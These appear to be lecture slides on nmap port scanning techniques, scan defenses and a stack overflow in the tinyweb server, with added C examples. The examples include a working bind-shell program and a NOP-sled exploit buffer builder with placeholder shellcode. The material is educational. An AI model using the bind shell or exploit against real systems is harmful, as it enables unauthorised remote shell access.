Port Scanning 0x470~0x480
Presenter: SangDuk Seo
Motivation
An analogy for addressing on a /24 network: the network address is like a ZIP code and the host address is like an office address. A port is then like one window of that office (for example :80 for a web server), and port scanning means walking along the building and checking which windows are open.
What is Port Scanning?
A way of figuring out which ports on a host are listening and accepting connections. It reveals which services a server exposes, which is the usual first step toward finding vulnerabilities in it.
nmap is the most popular open-source port scanner: nmap [scan type] [options] [target]
Scan types:
-sT full TCP connect scan
-sS SYN (half-open) scan
-sA ACK scan (maps firewall rules; it does not distinguish open from closed)
-sI idle (zombie) scan
-D decoy scan
-sU UDP scan
-sN NULL scan
-sX Xmas scan
-sF FIN scan
Options:
-d show debugging detail
-sV identify the application and version behind each port
-O identify the operating system
-oA save the results in all output formats
-p select the target ports
Port states reported:
open: a service accepts connections
filtered: the probe is blocked (typically by a firewall), so nmap cannot tell whether the port is open
closed: the port is reachable but nothing is listening
Full Connection Scanning
Tries to open a complete TCP connection to every possible port on the target system. Effective, but noisy and easy to detect: the application receives a finished connection and can log it.
Open port: attacker sends SYN, victim answers SYN/ACK, attacker completes the handshake with ACK.
Closed port: attacker sends SYN, victim answers RST.
Command: nmap -sT <target>
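The connect scan described above, as an added example in C that is not from the slides or from nmap: connect() completes the three-way handshake on an open port, a closed port answers RST (seen as ECONNREFUSED), and anything that times out or is unreachable is reported as filtered. The listener on 127.0.0.1 and the 500 ms timeout are this example's own assumptions; the SO_SNDTIMEO bound on connect() is Linux behaviour.

```c
/* connect_scan.c: the -sT idea with plain connect(): an open port completes the
 * handshake, a closed port answers RST (ECONNREFUSED), a filtered port times out. */
#include <arpa/inet.h>
#include <errno.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <unistd.h>

enum port_state { PORT_CLOSED = 0, PORT_OPEN = 1, PORT_FILTERED = -1 };

/* Probe one TCP port. timeout_ms bounds connect() via SO_SNDTIMEO (Linux honours
 * it for connect); a timeout or unreachable error is reported as filtered. */
int scan_port(const char *ip, unsigned short port, int timeout_ms)
{
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0) return PORT_FILTERED;
    struct timeval tv = { timeout_ms / 1000, (timeout_ms % 1000) * 1000 };
    setsockopt(fd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof tv);

    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    inet_pton(AF_INET, ip, &sa.sin_addr);

    int rc = connect(fd, (struct sockaddr *)&sa, sizeof sa);
    int err = errno;               /* save before close() can clobber it */
    close(fd);                     /* a full connection was made: the service saw us */
    if (rc == 0) return PORT_OPEN;
    return err == ECONNREFUSED ? PORT_CLOSED : PORT_FILTERED;
}

/* Scan [first, last], storing each state in out[]; returns the number of open ports. */
int scan_range(const char *ip, unsigned short first, unsigned short last,
               int timeout_ms, int *out)
{
    int open = 0;
    for (unsigned p = first; p <= last; p++) {
        out[p - first] = scan_port(ip, (unsigned short)p, timeout_ms);
        open += out[p - first] == PORT_OPEN;
    }
    return open;
}

/* Local listener on loopback so the scanner has something to find (port 0 = any free port). */
int open_listener(unsigned short port)
{
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0) return -1;
    struct sockaddr_in sa = { .sin_family = AF_INET, .sin_port = htons(port) };
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    int one = 1;
    setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &one, sizeof one);
    if (bind(fd, (struct sockaddr *)&sa, sizeof sa) < 0 || listen(fd, 5) < 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Port a listener actually got (needed after binding port 0). */
int listener_port(int fd)
{
    struct sockaddr_in sa;
    socklen_t len = sizeof sa;
    if (getsockname(fd, (struct sockaddr *)&sa, &len) < 0) return -1;
    return ntohs(sa.sin_port);
}

int main(void)
{
    int lfd = open_listener(0);
    int p = listener_port(lfd);
    printf("port %d while listening: %s\n", p,
           scan_port("127.0.0.1", (unsigned short)p, 500) == PORT_OPEN ? "open" : "not open");
    close(lfd);
    printf("port %d after close: %s\n", p,
           scan_port("127.0.0.1", (unsigned short)p, 500) == PORT_CLOSED ? "closed" : "other");
    return 0;
}
```

The noisy part is visible in the code: every probe to an open port is a completed connection that the application's accept() queue sees, which is exactly what the SYN scan on the next slide avoids.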
Stealth SYN Scan
Half-open scan: it never opens a full TCP connection. On an open port the victim answers SYN/ACK and the attacker immediately sends RST to tear the half-open connection down, so the service never sees a completed connection and is not accidentally DoSed by a pile of half-open sockets. On a closed port the victim answers RST.
Command: nmap -sS <target> (needs raw sockets, so root or equivalent)
FIN, Xmas, NULL Scan
These all send a nonsensical packet to every port on the target: FIN only, FIN+PSH+URG (Xmas), or no flags at all (NULL). If the port is closed and the implementation follows the protocol (RFC 793), an RST packet is sent back; an open port sends nothing, so silence is reported as open|filtered.
Commands: nmap -sF <target>, nmap -sX <target>, nmap -sN <target>
In the demo these scans failed, also when rerun with the -d option for debugging detail. Caveat: Windows and many other stacks answer RST to such a probe whatever the port state, so against them these scans show every port as closed.
Spoofing Decoys
nmap interleaves each real probe with probes whose source address is spoofed to several decoy IP addresses, so the target's logs show many scanners and cannot tell which one is real. The decoy addresses must be real addresses of live hosts: replies sent to a dead decoy never get a RST back, half-open connections pile up on the target, and it may be accidentally SYN flooded.
Command: nmap -D <decoy1>,<decoy2>,... <target>
Idle Scanning
Scans a target with packets spoofed from an idle host (the zombie) and reads the result off changes observed in the zombie. Requirements: a usable idle host that is not sending or receiving any other network traffic, and a TCP/IP implementation on it that produces predictable IP IDs, changing by a known increment with each packet. IP IDs are meant to be unique per packet per session; on Windows 95 and 2000 they are commonly incremented by 1 or 254 (depending on byte ordering). Recent Linux kernels, OpenBSD and Windows Vista randomize the IP ID, so they cannot serve as zombies and the technique does not work against them now.
Steps:
1. Probe the zombie and record its current IP ID.
2. Probe it again to identify the increment.
3. Send a SYN to a port on the target with the zombie's address spoofed as source. If the port is open the target sends SYN/ACK to the zombie, which replies with RST and uses up one more IP ID; if the port is closed the target sends RST, which the zombie ignores.
4. Probe the zombie again: an increase of two increments means open, one increment means closed or filtered.
If the zombie is not truly idle, other traffic moves the IP ID too and the results are skewed.
Command: nmap -sI <zombie> <target>
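The inference step of the idle scan, as an added example in C that is not from the slides or from nmap: given the zombie's IP ID before and after the spoofed SYN, and the increment learned from two consecutive probes, decide the port state, handling the 16-bit wrap-around and the case where the zombie turned out not to be idle. The step of 256 in the comment is the usual appearance of a Windows-style counter incremented by 1 in host byte order and read in network byte order; the slides give 1 or 254, and the function works for any step.

```c
/* idle_scan_logic.c: what the scanner concludes from the zombie's IP ID movement. */
#include <stdint.h>
#include <stdio.h>

enum idle_verdict { IDLE_NO_RESPONSE, IDLE_CLOSED_OR_FILTERED, IDLE_OPEN, IDLE_NOT_IDLE };

/* Difference between two 16-bit IP IDs read from the zombie, tolerating wrap at 0xFFFF. */
unsigned ipid_delta(uint16_t before, uint16_t after)
{
    return (uint16_t)(after - before);
}

/* Learn the zombie's per-packet step from the IDs of two consecutive probe replies
 * (1 for a classic counter; 256 for a little-endian counter read as big-endian). */
unsigned ipid_step(uint16_t first, uint16_t second)
{
    return ipid_delta(first, second);
}

/* id_before: IP ID from the probe sent before the spoofed SYN; id_after: from the probe
 * sent after it. The zombie's reply to that second probe costs one step. A second step
 * is spent only if the zombie also sent a RST, which it does in reaction to the target's
 * SYN/ACK, i.e. only when the target port was open (a closed port's RST is ignored). */
enum idle_verdict idle_verdict(uint16_t id_before, uint16_t id_after, unsigned step)
{
    unsigned d = ipid_delta(id_before, id_after);
    if (step == 0 || d == 0) return IDLE_NO_RESPONSE;      /* zombie did not answer */
    if (d == step)     return IDLE_CLOSED_OR_FILTERED;
    if (d == 2 * step) return IDLE_OPEN;
    return IDLE_NOT_IDLE;   /* other traffic touched the zombie: results are skewed */
}

int main(void)
{
    /* constructed IP IDs, as a scanner would read them from the zombie's replies */
    unsigned step = ipid_step(5000, 5001);
    printf("step %u, 5001->5003: %s\n", step,
           idle_verdict(5001, 5003, step) == IDLE_OPEN ? "open" : "closed|filtered or noise");
    return 0;
}
```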
Proactive Defense (Shroud): Close Ports
Close the ports we do not use. Find the process holding a port with fuser -n tcp <port>, stop it with kill -9 <pid>, and drop traffic to ports that should not be reachable at all, e.g. iptables -A INPUT -p udp --dport <port> -j DROP. A DROP rule makes the port show up as filtered rather than closed.
Proactive Defense (Shroud): No RST
FIN, NULL and Xmas scans depend on the RST a closed port sends, so a simple kernel modification defeats them: make the kernel function that sends TCP resets return immediately (a return; at its top) and recompile the kernel. If the kernel never sends reset packets, closed ports are as silent as open ones and these scans turn up nothing.
Open port: nothing. Closed port: nothing.
Caveat: the kernel then never resets any connection, legitimate or not.
Proactive Defense (Shroud): Full & Half-Open Scans
Make a sea of false positives so the attacker cannot tell which ports are really open: watch for incoming SYNs and answer each one, whatever the port's real state, with a spoofed SYN/ACK whose source is the destination the attacker probed and whose destination is the attacker's source. Every port then appears open.
In the demo this sometimes did not work.
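Both the probe side (the SYN, FIN, Xmas and NULL slides above) and the shroud reply on this slide come down to forging one 20-byte TCP header, so one added example in C covers both; it is not code from the slides, from nmap or from the book's shroud program. It builds the probe each scan type sends with a valid checksum, maps the reply (or silence) to nmap's verdict for that scan type, and forges the SYN/ACK a shroud defender sends back for a bare SYN. The addresses, ports, sequence numbers and window sizes are constructed values; a real sender would randomise the ISN and hand the header to a raw socket, which is left out here.

```c
/* tcp_probe_and_shroud.c: the TCP header every scan type sends, how the reply turns
 * into a verdict, and the forged SYN/ACK a shroud defender can send back. */
#include <arpa/inet.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define TH_FIN 0x01
#define TH_SYN 0x02
#define TH_RST 0x04
#define TH_PSH 0x08
#define TH_ACK 0x10
#define TH_URG 0x20

struct tcp_hdr {          /* option-less TCP header, every field in network byte order */
    uint16_t sport, dport;
    uint32_t seq, ack;
    uint8_t  off;         /* data offset in 32-bit words, kept in the high nibble */
    uint8_t  flags;
    uint16_t win, sum, urp;
};

enum scan { SCAN_SYN, SCAN_FIN, SCAN_XMAS, SCAN_NULL };
enum verdict { V_OPEN, V_CLOSED, V_FILTERED, V_OPEN_OR_FILTERED };

/* The flag combination each scan type puts on the wire. */
uint8_t probe_flags(enum scan s)
{
    switch (s) {
    case SCAN_SYN:  return TH_SYN;
    case SCAN_FIN:  return TH_FIN;
    case SCAN_XMAS: return TH_FIN | TH_PSH | TH_URG;   /* lit up like a Christmas tree */
    default:        return 0;                          /* NULL scan: no flags at all */
    }
}

/* Internet checksum over the pseudo-header (src, dst, protocol 6, length) and the header.
 * src/dst are host-order IPv4 addresses. Returns 0 when h->sum is already correct. */
uint16_t tcp_checksum(uint32_t src, uint32_t dst, const struct tcp_hdr *h)
{
    const uint8_t *p = (const uint8_t *)h;
    uint32_t acc = (src >> 16) + (src & 0xffff) + (dst >> 16) + (dst & 0xffff)
                 + 6 + sizeof *h;
    for (size_t i = 0; i < sizeof *h; i += 2)
        acc += (uint32_t)(p[i] << 8 | p[i + 1]);
    while (acc >> 16)
        acc = (acc & 0xffff) + (acc >> 16);
    return (uint16_t)~acc;
}

/* Build the probe a scanner sends for scan type s. */
void build_probe(uint32_t src, uint32_t dst, uint16_t sport, uint16_t dport,
                 enum scan s, struct tcp_hdr *h)
{
    memset(h, 0, sizeof *h);
    h->sport = htons(sport);
    h->dport = htons(dport);
    h->seq   = htonl(0x12345678);      /* constructed ISN; a real scanner randomises it */
    h->off   = 5 << 4;                 /* 5 words = 20 bytes, no options */
    h->flags = probe_flags(s);
    h->win   = htons(1024);
    h->sum   = htons(tcp_checksum(src, dst, h));
}

/* Turn what came back (or did not) into nmap's port state for that scan type. */
enum verdict classify(enum scan s, uint8_t reply_flags, int got_reply, int icmp_unreach)
{
    if (icmp_unreach) return V_FILTERED;
    int rst = got_reply && (reply_flags & TH_RST);
    if (s == SCAN_SYN) {
        if (got_reply && (reply_flags & (TH_SYN | TH_ACK)) == (TH_SYN | TH_ACK)) return V_OPEN;
        return rst ? V_CLOSED : V_FILTERED;
    }
    /* FIN/Xmas/NULL: RFC 793 says a closed port answers RST; an open port is silent,
     * which cannot be told apart from a firewall dropping the probe. */
    return rst ? V_CLOSED : V_OPEN_OR_FILTERED;
}

/* Shroud reply: answer a SYN the way an open port would, whatever the real state.
 * Returns 0 and builds nothing unless the incoming segment is a bare SYN. */
int shroud_synack(uint32_t victim, uint32_t attacker,
                  const struct tcp_hdr *syn, struct tcp_hdr *reply)
{
    if (syn->flags != TH_SYN) return 0;
    memset(reply, 0, sizeof *reply);
    reply->sport = syn->dport;                      /* pretend to be the probed port */
    reply->dport = syn->sport;
    reply->seq   = htonl(0xdeadbeef);               /* constructed ISN for the fake connection */
    reply->ack   = htonl(ntohl(syn->seq) + 1);      /* acknowledge the attacker's SYN */
    reply->off   = 5 << 4;
    reply->flags = TH_SYN | TH_ACK;
    reply->win   = htons(5840);
    reply->sum   = htons(tcp_checksum(victim, attacker, reply));
    return 1;
}
```

The shroud reply only helps if the real stack stays quiet for closed ports: if the kernel still answers the same SYN with RST, the attacker sees both segments and the illusion collapses, which is why it pairs with the no-RST kernel change from the previous slide.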
Reach Out and Hack Someone
tinyweb copies the incoming request into a fixed-size buffer with no code to limit the length, so an over-long request overflows the stack.
Analysis with GDB
Compile tinyweb with the -g option so it can be debugged. Run it, find its PID, and attach GDB to the process after it is already running.
Why attach instead of starting it under GDB? tinyweb requires root privileges (binding a port below 1024 requires root), so the debugger itself would have to run as root: sudo gdb ./tinyweb. Running under sudo, or with root's environment, changes what sits on the stack, so the addresses seen in the debugger's own run of the binary would not match the addresses when it runs normally. Instead: find the PID with ps and grep, then attach with sudo gdb --pid <pid>.
Analysis with GDB
Set a breakpoint in the function we know has the vulnerability (the request handler) and stop there. We will put the shellcode in the request buffer, so we need to find the saved return address and the buffer's position.
The slide computes the saved return address location as 0xbfff7b4 + 8 = 0xbfff7bc. The request buffer has 540 bytes of space; adding 200 so the jump does not aim at the exact buffer start gives 0xbffff668, the return address to use.
Almost Only Counts with Hand Grenades
Change RETADDR in the exploit: vim ./tinyweb_exploit.c. The exploit sends a NOP sled followed by the shellcode, so the return address only has to land somewhere in the sled.
Attacker's terminal: the exploit is sent. Victim's terminal: a shell appears on the server, but we are not at that console, so this does us no good.
Port-Binding Shellcode
Preparing the shellcode string: count the bytes (wc -c) to know its length, cut away the address column of the dump, prefix each byte with \x and delete the spaces between them. The result is the C string of the port-binding shellcode.
Port-Binding Shellcode
It works like the cat program, but over the network: the shellcode binds a port, accepts a connection, and hands that socket to a shell as its input and output, so we can reach the shell remotely instead of needing the console.
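What the port-binding shellcode does, written as ordinary C so the system-call sequence is visible; this is an added example, not the slides' shellcode or the book's source. socket/bind/listen, accept, three dup2 calls onto the accepted socket, then execve of /bin/sh: the shell reads and writes the connection exactly as cat would read and write a terminal. Port 31337 in main is an assumption; the test-friendly split into bind_listen and serve_shell is this example's own.

```c
/* bind_shell.c: what port-binding shellcode does, as plain C. */
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Step 1 of the shellcode: socket(), bind() to the port, listen(). Returns the listening fd. */
int bind_listen(unsigned short port)
{
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0) return -1;
    int one = 1;
    setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &one, sizeof one);
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    sa.sin_addr.s_addr = htonl(INADDR_ANY);   /* 0.0.0.0: reachable on any interface */
    if (bind(fd, (struct sockaddr *)&sa, sizeof sa) < 0 || listen(fd, 1) < 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Port the kernel actually assigned (port 0 asks for any free one). */
int bound_port(int fd)
{
    struct sockaddr_in sa;
    socklen_t len = sizeof sa;
    if (getsockname(fd, (struct sockaddr *)&sa, &len) < 0) return -1;
    return ntohs(sa.sin_port);
}

/* Steps 2-3: accept() one client, point stdin/stdout/stderr at that socket with dup2(),
 * then execve() a shell. Like cat, but the "terminal" is the network connection.
 * Returns only on failure. */
int serve_shell(int lfd)
{
    int c = accept(lfd, NULL, NULL);
    if (c < 0) return -1;
    dup2(c, 0);
    dup2(c, 1);
    dup2(c, 2);
    char *argv[] = { "/bin/sh", NULL };
    execve("/bin/sh", argv, NULL);
    return -1;   /* execve only returns on error */
}

int main(void)
{
    int lfd = bind_listen(31337);       /* assumed port; any free port works */
    if (lfd < 0) { perror("bind_listen"); return 1; }
    printf("listening on %d; connect with: nc <host> %d\n", bound_port(lfd), bound_port(lfd));
    return serve_shell(lfd) < 0 ? 1 : 0;
}
```

In shellcode form the same five calls are made with no libc, no error handling and no null bytes, which is why the string has to be checked before it goes into the exploit.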
Port-Binding Shellcode
Recount the layout: the NOP sled, the rest (the shellcode) and the return address copies must still add up to the same total size, so the longer port-binding shellcode shrinks the sled.
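The layout arithmetic on this slide and the "\x" formatting step two slides up, as one added example in C that is not the slides' tinyweb_exploit.c: it lays out [NOP sled][shellcode][return address repeated] in a buffer of the slide's 540 bytes with the slide's 0xbffff668, turns raw shellcode bytes into the \x string, and counts null bytes. The shellcode here is a constructed placeholder of int3 instructions, not real bind-shell code, and the 60 bytes of return-address copies are this example's assumption.

```c
/* exploit_layout.c: [NOP sled][shellcode][ret x N] for a request buffer, plus the
 * "\x.." formatting step used to paste shellcode into a C source file. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed placeholder, NOT real bind-shell shellcode: four int3 (0xcc) breakpoints,
 * so anything that actually runs it traps instead of executing. */
static const unsigned char demo_shellcode[] = { 0xcc, 0xcc, 0xcc, 0xcc };

/* Nulls matter when the payload travels through strcpy-style code; tinyweb's recv()
 * does not stop at a null, but the check costs nothing. Returns the number of null bytes. */
size_t count_nulls(const unsigned char *sc, size_t len)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++) n += sc[i] == 0;
    return n;
}

/* The slide's "add \x" step: bytes -> "\xcc\xcc..." for a C string literal.
 * Returns the characters written (without the terminator), 0 if out is too small. */
size_t escape_bytes(const unsigned char *sc, size_t len, char *out, size_t outsz)
{
    if (outsz < len * 4 + 1) return 0;
    for (size_t i = 0; i < len; i++) sprintf(out + i * 4, "\\x%02x", sc[i]);
    return len * 4;
}

/* Fill buf[total] as: NOP sled, shellcode, then ret repeated (little-endian) for the
 * last ret_bytes bytes, so the saved return address is overwritten wherever it sits in
 * that tail. total should end exactly at the saved return address slot so the 4-byte
 * copies stay aligned with it. Returns the sled length, or 0 if the pieces do not fit. */
size_t build_exploit(unsigned char *buf, size_t total, const unsigned char *sc, size_t sclen,
                     uint32_t ret, size_t ret_bytes)
{
    if (total < sclen + ret_bytes || ret_bytes % 4) return 0;
    size_t sled = total - sclen - ret_bytes;
    memset(buf, 0x90, sled);                       /* NOP sled: ret may land anywhere in it */
    memcpy(buf + sled, sc, sclen);
    for (size_t i = sled + sclen; i < total; i += 4) {
        buf[i]     = ret & 0xff;                   /* x86 is little-endian */
        buf[i + 1] = (ret >> 8) & 0xff;
        buf[i + 2] = (ret >> 16) & 0xff;
        buf[i + 3] = (ret >> 24) & 0xff;
    }
    return sled;
}

int main(void)
{
    unsigned char buf[540];          /* 540 bytes and 0xbffff668 are the slides' values */
    size_t sled = build_exploit(buf, sizeof buf, demo_shellcode, sizeof demo_shellcode,
                                0xbffff668, 60);
    char esc[64];
    escape_bytes(demo_shellcode, sizeof demo_shellcode, esc, sizeof esc);
    printf("sled %zu bytes, shellcode %s, %zu null bytes\n", sled, esc,
           count_nulls(demo_shellcode, sizeof demo_shellcode));
    return 0;
}
```

With the placeholder's 4 bytes the sled is 476 bytes; dropping in a real port-binding shellcode of a few dozen bytes shrinks the sled by exactly that much, which is the recount the slide asks for.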
QnA